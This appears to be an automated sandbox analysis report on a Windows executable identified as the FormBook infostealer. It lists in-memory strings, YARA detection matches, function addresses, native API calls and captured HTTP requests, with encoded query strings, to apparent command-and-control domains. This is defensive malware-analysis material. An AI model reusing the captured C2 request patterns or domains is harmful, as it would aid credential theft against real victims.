          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.govindfinance.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1Host: www.satellitephonstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1Host: www.driventow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1Host: www.kangrungao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2u2u8wnrrW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 0_2_019CCCCC0_2_019CCCCC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 0_2_019CF0900_2_019CF090
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 0_2_019CF0830_2_019CF083
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0040102D3_2_0040102D
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B8D33_2_0041B8D3
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041B8D63_2_0041B8D6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041C98B3_2_0041C98B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041C3433_2_0041C343
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00408C8B3_2_00408C8B
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00408C903_2_00408C90
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00402D8C3_2_00402D8C
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C0D203_2_012C0D20
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E41203_2_012E4120
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012CF9003_2_012CF900
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01392D073_2_01392D07
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01391D553_2_01391D55
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F25813_2_012F2581
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DD5E03_2_012DD5E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D841F3_2_012D841F
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013810023_2_01381002
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F20A03_2_012F20A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013920A83_2_013920A8
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DB0903_2_012DB090
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01392B283_2_01392B28
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FEBB03_2_012FEBB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01391FF13_2_01391FF1
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138DBD23_2_0138DBD2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012E6E303_2_012E6E30
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013922AE3_2_013922AE
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01392EF73_2_01392EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05340D2011_2_05340D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05411D5511_2_05411D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536412011_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534F90011_2_0534F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05412D0711_2_05412D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537258111_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535D5E011_2_0535D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535841F11_2_0535841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0540100211_2_05401002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A011_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535B09011_2_0535B090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_054120A811_2_054120A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537EBB011_2_0537EBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05411FF111_2_05411FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05366E3011_2_05366E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05412EF711_2_05412EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB8D611_2_00ACB8D6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACB8D311_2_00ACB8D3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACC98B11_2_00ACC98B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00ACC34311_2_00ACC343
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AB8C8B11_2_00AB8C8B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AB8C9011_2_00AB8C90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AB2D8C11_2_00AB2D8C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AB2D9011_2_00AB2D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_00AB2FB011_2_00AB2FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0534B150 appears 35 times
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: String function: 012CB150 appears 35 times
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004185F0 NtCreateFile,3_2_004185F0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004186A0 NtReadFile,3_2_004186A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00418720 NtClose,3_2_00418720
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,3_2_004187D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004185EB NtCreateFile,3_2_004185EB
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0041871A NtClose,3_2_0041871A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_004187CA NtAllocateVirtualMemory,3_2_004187CA
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01309910
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309540 NtReadFile,LdrInitializeThunk,3_2_01309540
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013099A0 NtCreateSection,LdrInitializeThunk,3_2_013099A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013095D0 NtClose,LdrInitializeThunk,3_2_013095D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01309860
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309840 NtDelayExecution,LdrInitializeThunk,3_2_01309840
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013098F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_013098F0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309710 NtQueryInformationToken,LdrInitializeThunk,3_2_01309710
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013097A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_013097A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309780 NtMapViewOfSection,LdrInitializeThunk,3_2_01309780
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309FE0 NtCreateMutant,LdrInitializeThunk,3_2_01309FE0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A20 NtResumeThread,LdrInitializeThunk,3_2_01309A20
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01309A00
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01309660
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309A50 NtCreateFile,LdrInitializeThunk,3_2_01309A50
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013096E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_013096E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130AD30 NtSetContextThread,3_2_0130AD30
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309520 NtWaitForSingleObject,3_2_01309520
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309560 NtWriteFile,3_2_01309560
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309950 NtQueueApcThread,3_2_01309950
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013095F0 NtQueryInformationFile,3_2_013095F0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013099D0 NtCreateProcessEx,3_2_013099D0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309820 NtEnumerateKey,3_2_01309820
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130B040 NtSuspendThread,3_2_0130B040
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013098A0 NtWriteVirtualMemory,3_2_013098A0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01309730 NtQueryVirtualMemory,3_2_01309730
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130A710 NtOpenProcessToken,3_2_0130A710
